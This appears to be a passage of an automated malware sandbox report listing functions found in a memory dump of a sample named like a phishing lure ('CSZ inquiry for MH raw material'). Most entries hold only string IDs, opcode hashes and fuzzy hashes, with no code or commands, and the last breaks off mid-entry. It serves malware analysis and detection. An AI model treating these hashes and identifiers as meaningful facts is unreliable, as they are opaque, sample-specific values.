                                                Function 015ACD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                • Instruction ID: 1f0e5f73b7fc9aa6e53840ff397225a1562c9ed9f90d4939eb32adfa6e2dfea3
                                                • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                • Instruction Fuzzy Hash: B0621870D012188FCB98DF9AC4D4AADB7B2FF8C311F648199E9816BB45C7356A16CF60
                                                Function 01522E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 34afff36c5640784fc762cc4922ceec961cbeea1b324c023b56936a4bb164ee7
                                                • Instruction ID: 728996f7655fccaf0e4a98fd49ad303dede6043dc93d231b72820de0eef0f242
                                                • Opcode Fuzzy Hash: 34afff36c5640784fc762cc4922ceec961cbeea1b324c023b56936a4bb164ee7
                                                • Instruction Fuzzy Hash: 0CF1A076608356CFD765CF28C080A6EBBE1BFCE610F14486DE9998F281DB38D945CB52
                                                Function 01502FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                • API String ID: 0-1036084923
                                                • Opcode ID: f43a46afdfaf47d8278612c82e79817d002de0d980be97fe74c68f2866f11438
                                                • Instruction ID: 53853035edd94f9dfba0b30db4c34b6c9eadc49e870ef41b97a71b773f2248de
                                                • Opcode Fuzzy Hash: f43a46afdfaf47d8278612c82e79817d002de0d980be97fe74c68f2866f11438
                                                • Instruction Fuzzy Hash: 3EF1AB71D10219AFDB66DFD9D881AAEBBF1FF88700F454429E911AF394E7309941CBA0
                                                Function 0158EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID:
                                                • API String ID: 3758378126-0
                                                • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                • Instruction ID: bfe8b1888abcbbced26d370760f7016d17ca3ba5a17ef528d21902c19dcec6a0
                                                • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                • Instruction Fuzzy Hash: EB416271F0011A9FDF18EEB9C8805BEF7F2FF88314B18867AD616EB284D67499518790
                                                Function 01500100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 1ef0a52434ec9bae91444c461ccfa6b2c315336967f7d2a808e4414bdcef47d3
                                                • Instruction ID: d893f796d22822495679fb1418c800bcdbb639a04222e7f4123a48b27c8faa79
                                                • Opcode Fuzzy Hash: 1ef0a52434ec9bae91444c461ccfa6b2c315336967f7d2a808e4414bdcef47d3
                                                • Instruction Fuzzy Hash: 1BA17E31A0425A67DF77CAA4CC51BFEABE5BF94394F04449AFE466F2C1C6B0DA408B50
                                                Function 015B4420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: d6655866390b886a3072fe6130a210e5933eb1328105fa043d0d665bb0556a2d
                                                • Instruction ID: 5015ec81e774e0a6a6710b62b7fd4db993575ff681944a30ece4de1a1fa3331f
                                                • Opcode Fuzzy Hash: d6655866390b886a3072fe6130a210e5933eb1328105fa043d0d665bb0556a2d
                                                • Instruction Fuzzy Hash: 90A116306003696ADF358E69CCC0BFE2BA4BF96754F080499AE879F2C3CB74C945CA50
                                                Function 01586420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 64a2dd29485083537a64cdd91c1c015e9ffad06b57049e623ae88e5aaf3d9235
                                                • Instruction ID: 6b000ed296c829add92f6e17ec5df6a7f61dc24f97eff8a8f57caeb8ad9537b1
                                                • Opcode Fuzzy Hash: 64a2dd29485083537a64cdd91c1c015e9ffad06b57049e623ae88e5aaf3d9235
                                                • Instruction Fuzzy Hash: 38915272A4021AAFEB21EB95CD85FAE7BB8FF59B54F140055F600BF190D774A904CBA0
                                                Function 015AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: ae2cc0065da7a8de04a003a50649d6dcab6c3fa09053c22ab168fe3804509215
                                                • Instruction ID: 356ae2eca3718a380d0ee0a38c71bf3cfc37f556cc49cfae3101a7d0f1468249
                                                • Opcode Fuzzy Hash: ae2cc0065da7a8de04a003a50649d6dcab6c3fa09053c22ab168fe3804509215
                                                • Instruction Fuzzy Hash: B191AE3294060AAFDB22ABA4DC55FAFBBB9FF85740F500029F500AB250E734A901CB90
                                                Function 0153A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: 52e4dfb39a215e9a2945355f772f16a5f45b89704334f3531911cfc04cd73331
                                                • Instruction ID: 56153b9d72bd59b56d426e41eeb6c2983361e57236feb905c883e02642f0c33e
                                                • Opcode Fuzzy Hash: 52e4dfb39a215e9a2945355f772f16a5f45b89704334f3531911cfc04cd73331
                                                • Instruction Fuzzy Hash: 9B718DB5E0061A8FEF28CF9DE4916ADBBF1BF88740F14812EE805AF241E7318901CB50
                                                Function 015A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                • Opcode ID: 168efb6ba0f444886afbab60205406ea0dded330524f5a097a84981e2bfc2ac7
                                                • Instruction ID: 67da233cb486afb682c74374838127d171f2cfe1ea44e1b4ac6b9b24cddb0904
                                                • Opcode Fuzzy Hash: 168efb6ba0f444886afbab60205406ea0dded330524f5a097a84981e2bfc2ac7
                                                • Instruction Fuzzy Hash: 8F51A272D4022A9FDF11DFD9D850AAEBBB5BF44A10F49412AEA11BF250D7B49C01CBE4
                                                Function 0151E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: cb80d93da237801652d938303b1e8aadf8d0e10ef270b3710e4e2eafb03657c7
                                                • Instruction ID: 86530b0a2c4c65c66bdf48c617a3eea59e1c0e3391476027f6d9812edf9faef1
                                                • Opcode Fuzzy Hash: cb80d93da237801652d938303b1e8aadf8d0e10ef270b3710e4e2eafb03657c7
                                                • Instruction Fuzzy Hash: 75416E725083529BF713EA65C841B6FBBE8FF88A14F44092EFA84DF184E674D9048792
                                                Function 0157C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 1d44c802c89a4c9b34e962218a3a8274dda11d0c6d9e28f89081514996d8c343
                                                • Instruction ID: a5dc5e4df0d25791deac3c3024b09e7fa7f872594284bc531aba6082d091c32a
                                                • Opcode Fuzzy Hash: 1d44c802c89a4c9b34e962218a3a8274dda11d0c6d9e28f89081514996d8c343
                                                • Instruction Fuzzy Hash: 084113B1D0052EABDB21DA50DC85FDEB77CBB95718F0045A5AA08AF140DB709E898FA4
                                                Function 01596B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: 68810b4dc4f0e1ea6f96a2f949484ef7e25bd44ec28a331264a6076657d94623
                                                • Instruction ID: 16e8e95f48490144cd0c6b31b8e61f4a251f0280de3cc48e029c1fc7b91e8955
                                                • Opcode Fuzzy Hash: 68810b4dc4f0e1ea6f96a2f949484ef7e25bd44ec28a331264a6076657d94623
                                                • Instruction Fuzzy Hash: 7C312831A007999BEF22DF69C854FAE7BA8FF45704F144028F940AF282D775E809CB91
                                                Function 0157CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 64971988b8a7a0b47ca1aae447655873ef03c06361bf24bf5554de60b8939c47
                                                • Instruction ID: c1bf96b9c488fb1d2e7cb54df9e1a94d32e806cbdb57c709ebfa81bce753bd53
                                                • Opcode Fuzzy Hash: 64971988b8a7a0b47ca1aae447655873ef03c06361bf24bf5554de60b8939c47
                                                • Instruction Fuzzy Hash: 4431013690051BAFEB16DA59E846E7FBBB4FF80720F114169B909AF250D7309E00DBE0
                                                Function 0158892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0158895E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                • Opcode ID: 6a25ba4527d4fefe88c59d6bd02de9d70d9df672c58324c4c5aaafc111ff557c
                                                • Instruction ID: 148f00c44c113149270df4415683d46ff76b836538aacff5bcbcaf172a642f80
                                                • Opcode Fuzzy Hash: 6a25ba4527d4fefe88c59d6bd02de9d70d9df672c58324c4c5aaafc111ff557c
                                                • Instruction Fuzzy Hash: 6A0126363102029BE6317B5ACC84F6A7FA5FFC1254B84052DF7417E162CB20A844C792
                                                Function 0153E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a44c5be99113510459c2c31d76024390bc1ca428a07f4c51623b6b00110df349
                                                • Instruction ID: b408fc2469009f436e5818fb4824112e089c863babb613ce8044d9f74a655add
                                                • Opcode Fuzzy Hash: a44c5be99113510459c2c31d76024390bc1ca428a07f4c51623b6b00110df349
                                                • Instruction Fuzzy Hash: 00823372F102188BCF58CFADD8916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                Function 0154516C Relevance: .8, Instructions: 785COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7a76cac1120e2f7e4df42150ca5c8d0491213807f6a7fd1e78ef562f368164e
                                                • Instruction ID: 3ae7b08be9c0c94b25a66a14ddd57f93ebc8838dcb59882ad6ed90557155442e
                                                • Opcode Fuzzy Hash: c7a76cac1120e2f7e4df42150ca5c8d0491213807f6a7fd1e78ef562f368164e
                                                • Instruction Fuzzy Hash: 9D62B33691864AAFCF25CF08D4904AEFB62BE5531CB49C55DC89B2F605E371BA48CBD0
                                                Function 015A2000 Relevance: .8, Instructions: 757COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1cf393907bc91d117bf34016575d32faad59c663c504ca9e5707a485d188598
                                                • Instruction ID: f7b25c7801cafd3af231b568fc7a6cfbc0e2c3ea9f1414375f87491fc7ae285e
                                                • Opcode Fuzzy Hash: c1cf393907bc91d117bf34016575d32faad59c663c504ca9e5707a485d188598
                                                • Instruction Fuzzy Hash: 7542B5356483429FD725CF68C891A6FBBE5BFC8300F88492DFA869B250D770D945CB52
                                                Function 0155739A Relevance: .7, Instructions: 705COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a6e9181c885281dd08fa1062c62e8297ba81832ccf00fc445dee9b152a823cc
                                                • Instruction ID: b069f51c6057e821510f6e0a18e54319a3b14d5d0aaf69bf4f964b40983444fd
                                                • Opcode Fuzzy Hash: 2a6e9181c885281dd08fa1062c62e8297ba81832ccf00fc445dee9b152a823cc
                                                • Instruction Fuzzy Hash: 6642BF71A006168FDB59CF59C4A0AAEBBF2FF8C314B54855ED952AF340D730E942CBA0
                                                Function 0152B2C0 Relevance: .6, Instructions: 629COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d150693ef1e4c635eb1f24eb1ee4c206ab2b8ec83845be019e0029940e3d6f30
                                                • Instruction ID: 046468905c6c33368e736075b0462efb749951b78f4edcf561a3e518c898f852
                                                • Opcode Fuzzy Hash: d150693ef1e4c635eb1f24eb1ee4c206ab2b8ec83845be019e0029940e3d6f30
                                                • Instruction Fuzzy Hash: 3032B676E0122ADBDF24DF98C890BAEBBB5FF55714F180029E905AF391E7359901CB90
                                                Function 01598158 Relevance: .6, Instructions: 617COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4379a8e4195f6ff758f7e06eba4c2b87d2de6e8e384a22c489cf289eac55a8bb
                                                • Instruction ID: 0ae25307df3be4edf79cd3f61743448a0aed3ede6f5b12825f4c38bb95acfa6c
                                                • Opcode Fuzzy Hash: 4379a8e4195f6ff758f7e06eba4c2b87d2de6e8e384a22c489cf289eac55a8bb
                                                • Instruction Fuzzy Hash: A6426C75A102198FEF24CF69C881BADBBF5BF89300F148099E949EF242D7349985CF61
                                                Function 01512840 Relevance: .6, Instructions: 605COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c91944ff5ba4db25558f6fb910fa3e5900cb38365bac9bedfe3a92c5f1e08ff7
                                                • Instruction ID: 9be7250a015c764e029af6eb3a1f0d24144e90d6dfbe8ad4b6af47a43965145f
                                                • Opcode Fuzzy Hash: c91944ff5ba4db25558f6fb910fa3e5900cb38365bac9bedfe3a92c5f1e08ff7
                                                • Instruction Fuzzy Hash: D032EE70A007568FEB25CF69C8547BEBBFABF84704F24851DD4869F285DB35A842CB90
                                                Function 015AA118 Relevance: .6, Instructions: 591COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ee6ac6a24f5f8e9c05174a589e351e660c377719e2704e9f36d22662a1d0aa5
                                                • Instruction ID: cce7ad0b29acf41714b1fc4d2140b9ccaa7183d88a591504ee5170aeb67072e6
                                                • Opcode Fuzzy Hash: 3ee6ac6a24f5f8e9c05174a589e351e660c377719e2704e9f36d22662a1d0aa5
                                                • Instruction Fuzzy Hash: DC22C3706446618FEB25CF2DC09477EBBF1BF44300F88885AE9968F286E775E452DB60
                                                Function 015C16CC Relevance: .6, Instructions: 571COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f087c4bc9e1c10061a0905cf060ae76759aae9684fd05665376aa93c56e71780
                                                • Instruction ID: 2892532fab3475fbd2115a6f85dccb81167e0567258f571953d8ca3d4bb3812a
                                                • Opcode Fuzzy Hash: f087c4bc9e1c10061a0905cf060ae76759aae9684fd05665376aa93c56e71780
                                                • Instruction Fuzzy Hash: 2D22CD35A00616CFDB19CF98C4D0AAEB7F2BF88704B24856DD9559F346EB30A942CB90
                                                Function 0152FB80 Relevance: .6, Instructions: 559COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb3bc0f3f87ee402fe4af8a4fe12537d2c122b36a27bddbf37d46e521ad56a63
                                                • Instruction ID: 97371fc372d5bebd631d772a3e79c7e0e6bd423045209e1358255f94084bae54
                                                • Opcode Fuzzy Hash: eb3bc0f3f87ee402fe4af8a4fe12537d2c122b36a27bddbf37d46e521ad56a63
                                                • Instruction Fuzzy Hash: 6D22B3719002069FEB11DFA8D881BAEB7F5FF85300F248569E915DF286E734EA45CB90
                                                Function 01528DBF Relevance: .6, Instructions: 554COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6953cf00520962d8a1da678207d18f65eea9bd4d9fc45966f6d518e077d6960b
                                                • Instruction ID: 823dede5f7262a43ad511af7a77b89d17095e398d796ed1004bd091852e1578c
                                                • Opcode Fuzzy Hash: 6953cf00520962d8a1da678207d18f65eea9bd4d9fc45966f6d518e077d6960b
                                                • Instruction Fuzzy Hash: 8E224071E0012ADBCB15CF99C4809BEFBF6BF49314B18845AE995AF241E774ED41CBA0
                                                Function 01506A50 Relevance: .5, Instructions: 548COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a13f7a6b2e5115303cc852ea454602ae5feb4540d7ce010bb83f9496fa39798d
                                                • Instruction ID: ae8a95426480fdcf30478e2506cb007f298a71e4a2e3712ebd5c8616a7354f4a
                                                • Opcode Fuzzy Hash: a13f7a6b2e5115303cc852ea454602ae5feb4540d7ce010bb83f9496fa39798d
                                                • Instruction Fuzzy Hash: 59326B71A00615CFDB26CFA9C480AAEBBF5FF88310F144569E956AF391D734E851CB90
                                                Function 015C2446 Relevance: .5, Instructions: 485COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12a8168d9856be1041a064ea0ee00b3d6d25d368fee6717bbb04b96f0686989e
                                                • Instruction ID: f87804107a2d117ed0a348230bf99bf0b6140aeeeb4e6c06f4e67ddd57f93df9
                                                • Opcode Fuzzy Hash: 12a8168d9856be1041a064ea0ee00b3d6d25d368fee6717bbb04b96f0686989e
                                                • Instruction Fuzzy Hash: CF02D0346046518FD724CFAEC4902BABBF1BF95B00F15859EE996CF282D734D882DB60
                                                Function 01555630 Relevance: .5, Instructions: 458COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                • Instruction ID: ffb0d5ffaedd461392ff03f0fc5286a20521a18151f0aafea998c91714caa2ef
                                                • Opcode Fuzzy Hash: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                • Instruction Fuzzy Hash: FDD14573B6471C4FC384DE6EDC82381B2D2ABD4528B5D843C9D18CB303F669E91E6688
                                                Function 015C41A2 Relevance: .5, Instructions: 452COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d5b4900055d4ebee09f962b0a9a82bbb1828d1d445910267d8cc0171f93e030
                                                • Instruction ID: f8136454d9641b4ad839281363407a603df96885268dd533ece6a62b181cfe09
                                                • Opcode Fuzzy Hash: 1d5b4900055d4ebee09f962b0a9a82bbb1828d1d445910267d8cc0171f93e030
                                                • Instruction Fuzzy Hash: 8702AE71E00219CFCB05CF98C4A0AADFBB2FF98714F29856DD956AB355D730A982CB50
                                                Function 015DB16B Relevance: .4, Instructions: 450COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9b6151b1f9f721e835784c3e5634c9b11ab46ff9aa53b248207e4a402bfb734
                                                • Instruction ID: 7a20a4be492b94e22cf220907cf68c7034cb718c9c70ed6ec43feff22b06a5cd
                                                • Opcode Fuzzy Hash: e9b6151b1f9f721e835784c3e5634c9b11ab46ff9aa53b248207e4a402bfb734
                                                • Instruction Fuzzy Hash: ECF1E572E006118BDF28CFADC99067EBBF6BF9921071A416DD856DF381E634EA41CB50
                                                Function 015DA9A6 Relevance: .4, Instructions: 425COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 23f8decfc9e584b4d7d8fc59ec412b89f20e0b8bff8903a084d267bb1893188e
                                                • Instruction ID: 38f8ee7948702ce56f495630ede3029d3947911be84cab21950a4675ae05f49c
